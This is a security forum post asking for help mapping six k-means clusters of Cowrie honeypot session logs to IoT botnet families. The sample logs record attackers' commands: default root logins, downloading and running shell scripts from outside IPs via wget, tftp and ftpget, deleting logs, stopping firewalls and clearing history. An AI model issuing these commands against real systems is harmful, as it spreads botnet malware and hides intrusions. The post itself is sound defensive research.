Threat Level: green Handler on Duty: Russ McRee

SANS ISC: Need help with classifying botnets via log entries - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Need help with classifying botnets via log entries
Hey there,

i wrote a program which successfully does k-means clustering with cowrie log entries from honeypots to assign attack cycles to one of 6 different clusters so i can statistically analyze what type of bot is used by attackers. My problem is, that I can't find many informations about typical log entries from bots on the internet. Can someone of you assign the following examples of each cluster to a common botnet (e.g. Mirai, Bashlite, etc.)?


#########
CLUSTER 0
#########
14 11 31.14.45.6 37045 2016-10-11T15:15:03+0000 New connection
14 11 31.14.45.6 37045 2016-10-11T15:15:04+0000 login attempt [root/root] succeeded
14 11 31.14.45.6 37045 2016-10-11T15:15:05+0000 Opening TTY Log: log/tty/20161011-151505-None-11i....
14 11 31.14.45.6 37045 2016-10-11T15:15:05+0000 Warning: state changed and new state returned
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: enable
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command not found: enable
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: system
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command not found: system
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: shell
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command not found: shell
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: sh
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: sh
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: cat /proc/mounts; /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: cat /proc/mounts
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:40+0000 Closing TTY Log: log/tty/20161011-151505-None-11i....
14 11 31.14.45.6 37045 2016-10-11T15:15:40+0000 Connection lost after 37 seconds


#########
CLUSTER 1
#########
21806 6035 113.23.72.170 60272 2016-10-20T00:45:11+0000 New connection
21806 6035 113.23.72.170 60272 2016-10-20T00:45:13+0000 login attempt [root/root] succeeded
21806 6035 113.23.72.170 60272 2016-10-20T00:45:13+0000 Opening TTY Log: log/tty/20161020-004513-None-6035...
21806 6035 113.23.72.170 60272 2016-10-20T00:45:13+0000 Warning: state changed and new state returned
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: enable
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command not found: enable
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: system
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command not found: system
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: shell
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command not found: shell
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: sh
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command found: sh
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 CMD: cat /proc/mounts; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cat /proc/mounts
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 CMD: cd /dev && >.s || cd /var/tmp/ && >.s || cd /...
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /dev
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /var/tmp
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /var/run
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /var
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /tmp
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /home
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cat /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cp /bin/echo /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 CMD: /bin/busybox chmod 777 .s; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 Command found: /bin/busybox chmod 777 /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 Command found: chmod 777 /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:18+0000 CMD: cat .s; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:18+0000 Command found: cat /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:18+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:19+0000 Closing TTY Log: log/tty/20161020-004513-None-6035...
21806 6035 113.23.72.170 60272 2016-10-20T00:45:19+0000 Connection lost after 8 seconds


#########
CLUSTER 2
#########
94 88 61.222.241.117 47743 2016-10-11T16:02:04+0000 New connection
94 88 61.222.241.117 47743 2016-10-11T16:02:14+0000 login attempt [root/root] succeeded
94 88 61.222.241.117 47743 2016-10-11T16:02:15+0000 Opening TTY Log: log/tty/20161011-160215-None-88i....
94 88 61.222.241.117 47743 2016-10-11T16:02:15+0000 Warning: state changed and new state returned
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 CMD: sh || bash || shell
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 Command found: sh
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 Command found: bash
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 Command not found: shell
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 CMD: echo loldongs || busybox echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 Command found: echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 Command found: busybox echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 Command found: echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 CMD: cd /tmp || cd /var/run || cd /dev/shm || cd /...
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /tmp
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /var/run
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /dev/shm
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /mnt
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /var
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: rm -f /var/log /var/run /var/mail /...
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: busybox wget http://93.158.200.115/...
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: wget http://93.158.200.115/one.sh
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: wget http://93.158.200.115/one.sh
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Closing TTY Log: log/tty/20161011-160215-None-88i....
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Connection lost after 23 seconds


#########
CLUSTER 3
#########
3427 3267 85.105.155.21 40020 2016-10-12T21:37:33+0000 New connection
3427 3267 85.105.155.21 40020 2016-10-12T21:37:33+0000 login attempt [root/root] succeeded
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 Opening TTY Log: log/tty/20161012-213734-None-3267...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 Warning: state changed and new state returned
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 CMD: shell
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 Command not found: shell
3427 3267 85.105.155.21 40020 2016-10-12T21:37:37+0000 CMD: sh
3427 3267 85.105.155.21 40020 2016-10-12T21:37:37+0000 Command found: sh
3427 3267 85.105.155.21 40020 2016-10-12T21:37:39+0000 CMD: free
3427 3267 85.105.155.21 40020 2016-10-12T21:37:39+0000 Command found: free
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 CMD: mkdir -p /var/... && rm -f /var/.../*; ftpget...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: mkdir -p /var/...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: rm -f /var/.../*
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command not found: ftpget -u ftp 164.132.237.180 /...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: wget -O /var/.../dn.sh http://164.1...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command not found: tftp -g -r dn.sh -l /var/.../dn...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: chmod +x /var/.../dn.sh
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: sh /var/.../dn.sh &
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 CMD: /etc/firewall_stop
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command not found: /etc/firewall_stop
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Closing TTY Log: log/tty/20161012-213734-None-3267...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Connection lost after 7 seconds


#########
CLUSTER 4
#########
4513 4310 46.172.91.20 47029 2016-10-13T04:59:41+0000 New connection
4513 4310 46.172.91.20 47029 2016-10-13T04:59:43+0000 login attempt [root/123456] succeeded
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 Opening TTY Log: log/tty/20161013-045944-None-4310...
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 Warning: state changed and new state returned
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 CMD: sh
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 Command found: sh
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 CMD: mount
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 Command found: mount
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 Reading txtcmd from "txtcmds/bin/mount"
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 CMD: cat /proc/cpuinfo
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 Command found: cat /proc/cpuinfo
4513 4310 46.172.91.20 47029 2016-10-13T04:59:50+0000 Closing TTY Log: log/tty/20161013-045944-None-4310...
4513 4310 46.172.91.20 47029 2016-10-13T04:59:50+0000 Connection lost after 8 seconds


#########
CLUSTER 5
#########
3531 3363 124.107.59.21 35557 2016-10-12T22:58:26+0000 New connection
3531 3363 124.107.59.21 35557 2016-10-12T22:58:54+0000 login attempt [root/root] succeeded
3531 3363 124.107.59.21 35557 2016-10-12T22:58:54+0000 Opening TTY Log: log/tty/20161012-225854-None-3363...
3531 3363 124.107.59.21 35557 2016-10-12T22:58:54+0000 Warning: state changed and new state returned
3531 3363 124.107.59.21 35557 2016-10-12T22:59:16+0000 CMD: sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:16+0000 Command found: sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 CMD: cd /tmp || cd /var/run || cd /mnt || cd /root...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /tmp
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /var/run
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /mnt
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /root
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: wget http://45.32.194.93/bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 CMD: cd /tmp || cd /var/run || cd /mnt || cd /root...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /tmp
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /var/run
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /mnt
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /root
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: wget http://45.32.194.93/bins.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: chmod 777 bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: tftp 45.32.194.93 -c get tftp1....
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: chmod 777 tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: tftp -r tftp2.sh -g 45.32.194.9...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: chmod 777 tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: ftpget -v -u anonymous -p anony...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh ftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: rm -rf bins.sh tftp1.sh tftp2.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: rm -rf *
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: history -c
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 CMD: cd /tmp || cd /var/run || cd /mnt || cd /root...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /tmp
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /var/run
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /mnt
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /root
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: wget http://45.32.194.93/bins.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: chmod 777 bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: tftp 45.32.194.93 -c get tftp1....
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: chmod 777 tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: tftp -r tftp2.sh -g 45.32.194.9...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: chmod 777 tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: ftpget -v -u anonymous -p anony...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh ftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: rm -rf bins.sh tftp1.sh tftp2.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: rm -rf *
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: history -c
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Closing TTY Log: log/tty/20161012-225854-None-3363...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Connection lost after 66 seconds
Anonymous

Sign Up for Free or Log In to start participating in the conversation!